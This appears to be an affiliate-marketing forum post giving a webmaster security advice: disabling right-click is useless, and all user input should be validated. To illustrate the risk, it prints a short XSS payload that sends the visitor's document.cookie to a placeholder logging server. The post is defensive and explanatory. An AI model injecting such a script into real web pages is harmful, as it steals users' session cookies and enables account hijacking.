The Most Active and Friendliest
Affiliate Marketing Community Online!

“Adavice”/  “1Win

Security issue

temi

affiliate
I think you may want to consult vB.net security book. I think most webmasters here use PHP/MySQL

there really is no point in disabling right click, all you have todo is disable javascript using a firefox extension... or just turning it of anyways... or even simpler on firefox click view>page source or even just press ctrl + u....

yes i went on abit there but my point is its very easy to stop/bypas the disable right click function that people WILL disable your javascript and take alook at your page source just because you dont want them to...

i actually review the code of most the websites i visit... you can very quickly tell what kinda site they are running... or just take alook at the code for a SEO point of view.

im a php programmer so cant even remotley help with knowledge of the subject but... VALIDATE ALL INPUT... make sure that every bit of information sent to your site is checked before being used with an sql query for instance.

scan all inputs and text feilds for javascript as an attacker can gain accsess simply by running some javascript like this, with a program on the 3rd party server just saving cookie data

Code:
[COLOR=#009900][COLOR=#000000][B]<script>[/B][/COLOR][/COLOR]
new Image().src="http://server.com/log.cgi?c="+encodeURI(document.cookie);
[COLOR=#009900][COLOR=#000000][B]</script>[/B][/COLOR][/COLOR]
just remember you don't trust your users, the information sent to your server should ALWAYS be untrusted until proven safe always.

found a forum that should have an answer from people that talk your talk... sorry i couldnt help more

Visual Basic .NET Forums - The Exclusive VB.NET Community

Last edited by a moderator:
banners
Back